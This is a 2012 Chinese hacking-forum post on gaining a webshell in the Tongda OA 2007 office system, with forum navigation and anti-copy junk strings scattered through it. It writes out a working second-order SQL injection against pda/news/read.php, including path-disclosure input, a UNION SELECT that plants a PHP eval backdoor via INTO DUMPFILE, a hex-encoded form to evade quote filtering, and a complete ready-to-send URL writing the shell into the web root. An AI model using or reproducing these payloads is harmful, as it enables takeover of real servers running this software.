找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2507|回复: 0
打印 上一主题 下一主题

通达OA2007版本漏洞及getshell

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-20 08:09:24 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
目前测试通达OA2007版本
$ j* q5 d+ m# i$ ^1 ]1 p7 i- ^- ?, O3 t& ]4 w5 f

) P1 j7 v8 v+ H/ i2 \7 |9 zOffice Anywhere 2007 网络智能办公系统
, G: ]! X) k  i
- ?) d" n2 V0 Q2 S8 E9 U+ `0 b4 _http://127.0.0.1/pda/news/read.php?P=%cf'    猪点。   暴web目录..
. V; d5 Z% i; S7 m/ c1 K   K. A) g* s( z' r

! w8 b3 a' }1 x& Z+ _0 @! f这个时候看了下代码,存在注入的那个变量的语句中第3个字段,在该文件下面被另外个select语句调用了,灵光一闪,大概思路是这样的
) ~) g- K2 ^1 G0 f+ e/ r
$ Y' A/ v( ~0 j1 q例如:SELECT * from USER where USER_ID='{$USERNAME}'  
8 H5 d0 o" v  b) b其中有这么段字段声明$PROVIDER = $ROW['PROVIDER'];被下面个语句$query1 = "SELECT * from USER where USER_ID='{$PROVIDER}'";带入查询了
$ t7 A7 ^; {6 q5 j7 f; T/ Q - R, {) I; j+ h) E  _: k  N- ]
这个时候我们是不是可以组合起来使用哪?
6 w# `* @1 }" a$ d 7 _- Y4 J# M3 J9 {+ Y
第一条语句开始注入,union select 1,2,3,4,5,6,7,8,9,10...,比如第3个是PROVIDER字段,我们这样( N( s* e( V+ ~
union select 1,2,'UNION SELECT 1,1,1,'<?php eval($v);?>',1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 into dumpfile'B:/m.php'#,4,5,6,7,8,9,10
* |5 z5 ?) ?0 g # k5 H7 D9 }9 F6 F' ?
这样'UNION SELECT 1,1,1,'<?php eval($v);?>',1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 into dumpfile'B:/m.php'#这个语句就带入第二条语句去写webshell了
- [& d" b/ r0 t- S  V! j
& X1 J- @# z% K那么问题来了,单引号可以吗?当然是不可以的,^_^。。。7 O  A: `; J; s0 K" i# u8 v

  l' f$ ], ^( j: @( u: N那么我们用字符串格式带入进行hex编码0 N3 ]& I& J; o
4 f* k1 c% I% A. r3 l- a9 h4 b
%cf'UNION SELECT 1,2,3,0x27554e494f4e2053454c45435420312c312c312c273c3f706870206576616c282476293b3f3e272c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c3120696e746f2064756d7066696c6527423a2f6d2e7068702723,5,6,7,8,9,10,11,12,13,14,15,16%23
+ c. D5 W4 z" A+ w; a( _
2 c2 N$ g  M, G, z' F7 J. ?% B4 K, h测试ok,获取oa的webshell
( A% l% A! |; K' d
0 W! W' `' w2 ^' w+ P
2 j- g" V8 K3 c8 R9 U7 ~pda/news/read.php?P=%cf'or%281=1%29%23&NEWS_ID=%cf'UNION SELECT 1,2,3,0x27554E494F4E2053454C45435420312C312C312C273C3F706870206576616C282476293B3F3E272C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C3120696E746F2064756D7066696C6527443A2F4D594F412F776562726F6F742F6D2E7068702723,5,6,7,8,9,10,11,12,13,14,15,16%23. {) A0 \$ |* {8 f, \
直接getwebshell
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表